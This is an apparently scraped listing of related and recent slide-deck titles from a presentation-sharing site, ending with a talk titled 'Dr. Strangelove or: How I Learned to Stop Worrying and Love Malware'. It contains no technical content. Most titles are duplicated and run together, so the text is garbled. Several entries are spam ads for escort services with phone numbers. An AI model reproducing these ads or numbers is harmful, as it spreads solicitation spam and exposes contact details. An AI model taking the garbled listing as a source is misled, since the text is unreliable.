Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Último (20)

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware